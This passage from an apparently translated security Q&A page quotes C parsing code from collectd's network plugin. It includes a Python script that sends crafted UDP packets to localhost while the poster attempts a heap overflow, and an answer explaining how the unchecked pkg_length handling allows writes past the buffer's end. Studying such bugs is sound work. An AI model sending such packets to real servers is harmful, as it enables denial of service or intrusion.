', sizeof (n)); status = 0; while ((status == 0) && (0 < buffer_size) && ((unsigned int) buffer_size > sizeof (part_header_t))) { uint16_t pkg_length; uint16_t pkg_type; memcpy ((void *) &pkg_type, (void *) buffer, sizeof (pkg_type)); memcpy ((void *) &pkg_length, (void *) (buffer + sizeof (pkg_type)), sizeof (pkg_length)); pkg_length = ntohs (pkg_length); pkg_type = ntohs (pkg_type); if (pkg_length > buffer_size) break; /* Ensure that this loop terminates eventually */ if (pkg_length < (2 * sizeof (uint16_t))) break; if (pkg_type == TYPE_ENCR_AES256) { status = parse_part_encr_aes256 (se, &buffer, &buffer_size, flags); if (status != 0) { ERROR ("network plugin: Decrypting AES256 " "part failed " "with status %i.", status); break; } } #if HAVE_LIBGCRYPT else if ((se->data.server.security_level == SECURITY_LEVEL_ENCRYPT) && (packet_was_encrypted == 0)) { if (printed_ignore_warning == 0) { INFO ("network plugin: Unencrypted packet or " "part has been ignored."); printed_ignore_warning = 1; } buffer = ((char *) buffer) + pkg_length; continue; } #endif /* HAVE_LIBGCRYPT */ else if (pkg_type == TYPE_SIGN_SHA256) { status = parse_part_sign_sha256 (se, &buffer, &buffer_size, flags); if (status != 0) { ERROR ("network plugin: Verifying HMAC-SHA-256 " "signature failed " "with status %i.", status); break; } } #if HAVE_LIBGCRYPT else if ((se->data.server.security_level == SECURITY_LEVEL_SIGN) && (packet_was_encrypted == 0) && (packet_was_signed == 0)) { if (printed_ignore_warning == 0) { INFO ("network plugin: Unsigned packet or " "part has been ignored."); printed_ignore_warning = 1; } buffer = ((char *) buffer) + pkg_length; continue; } #endif /* HAVE_LIBGCRYPT */ else if (pkg_type == TYPE_VALUES) { status = parse_part_values (&buffer, &buffer_size, &vl.values, &vl.values_len); if (status != 0) break; network_dispatch_values (&vl, username); sfree (vl.values); } else if (pkg_type == TYPE_TIME) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) { vl.time = TIME_T_TO_CDTIME_T (tmp); n.time = TIME_T_TO_CDTIME_T (tmp); } } else if (pkg_type == TYPE_TIME_HR) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) { vl.time = (cdtime_t) tmp; n.time = (cdtime_t) tmp; } } else if (pkg_type == TYPE_INTERVAL) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) vl.interval = TIME_T_TO_CDTIME_T (tmp); } else if (pkg_type == TYPE_INTERVAL_HR) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) vl.interval = (cdtime_t) tmp; } else if (pkg_type == TYPE_HOST) { status = parse_part_string (&buffer, &buffer_size, vl.host, sizeof (vl.host)); if (status == 0) sstrncpy (n.host, vl.host, sizeof (n.host)); } else if (pkg_type == TYPE_PLUGIN) { status = parse_part_string (&buffer, &buffer_size, vl.plugin, sizeof (vl.plugin)); if (status == 0) sstrncpy (n.plugin, vl.plugin, sizeof (n.plugin)); } else if (pkg_type == TYPE_PLUGIN_INSTANCE) { status = parse_part_string (&buffer, &buffer_size, vl.plugin_instance, sizeof (vl.plugin_instance)); if (status == 0) sstrncpy (n.plugin_instance, vl.plugin_instance, sizeof (n.plugin_instance)); } else if (pkg_type == TYPE_TYPE) { status = parse_part_string (&buffer, &buffer_size, vl.type, sizeof (vl.type)); if (status == 0) sstrncpy (n.type, vl.type, sizeof (n.type)); } else if (pkg_type == TYPE_TYPE_INSTANCE) { status = parse_part_string (&buffer, &buffer_size, vl.type_instance, sizeof (vl.type_instance)); if (status == 0) sstrncpy (n.type_instance, vl.type_instance, sizeof (n.type_instance)); } else if (pkg_type == TYPE_MESSAGE) { status = parse_part_string (&buffer, &buffer_size, n.message, sizeof (n.message)); if (status != 0) { /* do nothing */ } else if ((n.severity != NOTIF_FAILURE) && (n.severity != NOTIF_WARNING) && (n.severity != NOTIF_OKAY)) { INFO ("network plugin: " "Ignoring notification with " "unknown severity %i.", n.severity); } else if (n.time <= 0) { INFO ("network plugin: " "Ignoring notification with " "time == 0."); } else if (strlen (n.message) <= 0) { INFO ("network plugin: " "Ignoring notification with " "an empty message."); } else { plugin_dispatch_notification (&n); } } else if (pkg_type == TYPE_SEVERITY) { uint64_t tmp = 0; status = parse_part_number (&buffer, &buffer_size, &tmp); if (status == 0) n.severity = (int) tmp; } else { DEBUG ("network plugin: parse_packet: Unknown part" " type: 0x%04hx", pkg_type); buffer = ((char *) buffer) + pkg_length; } } /* while (buffer_size > sizeof (part_header_t)) */ if (status == 0 && buffer_size > 0) WARNING ("network plugin: parse_packet: Received truncated " "packet, try increasing 'MaxPacketSize'"); return (status); } /* }}} int parse_packet */

Actualización 2:

Hmmmm ... no go ... estaba intentando desbordar los valores de parse_part_values () pero hay una comprobación de esto:

Hmmmm ... aquí se detiene:

[2017-02-12 16:43:18] complemento de red: parse_part_values: paquete demasiado corto: se espera un fragmento del tamaño 726, pero el búfer solo tiene 51 bytes.

Aquí está el código que produce arriba:

exp.py

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET, # Internet
             socket.SOCK_DGRAM) # UDP

str="\x00\x05\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"


sock.sendto(str,(UDP_IP, UDP_PORT))

A continuación se muestra un marco desensamblado en Wireshark para el código anterior:

    
pregunta android_dev 10.02.2017 - 14:55
fuente

1 respuesta

2

Ya que se argumenta que es un desbordamiento del montón, asumo que el buffer está en el montón. Y eso es lo que sugiere la solución que el enlace sugiere.

El problema es que pkg_length se toma del búfer, que es un paquete de red que, por lo tanto, es suministrado por un cliente que se conecta:

memcpy ((void *) &pkg_length,
        (void *) (buffer + sizeof (pkg_type)),
        sizeof (pkg_length));

Ese uint16 puede configurarse para lo que quiera la persona que envíe el paquete. Ahora, con bastante frecuencia se realiza lo siguiente:

buffer = ((char *) buffer) + pkg_length;

Lo que está bien a menos que sea pkg_length > buffer_size , pero al principio hay una comprobación:

if (pkg_length > buffer_size)
    break;

El problema comienza con el hecho de que puede haber más de un paquete en el búfer, ya que tenemos un bucle while sobre él. Segundo, tenemos todas esas funciones parse_* actualizando buffer_size , pero no se pasan pkg_size . Estas funciones solo pueden saber qué analizaron y actualizar buffer_size en consecuencia.

Entonces, en el primer paquete enviamos un enorme pkg_length (que aún es más pequeño que buffer_size ) y avanzamos el buffer hacia adelante. Luego, en un segundo o tercer paquete (o más) podemos agregar pkg_length que es más grande que el resto del búfer pero aún más pequeño que buffer_size . Esto nos permitirá escribir después del final del búfer.

    
respondido por el grochmal 12.02.2017 - 01:11
fuente

Lea otras preguntas en las etiquetas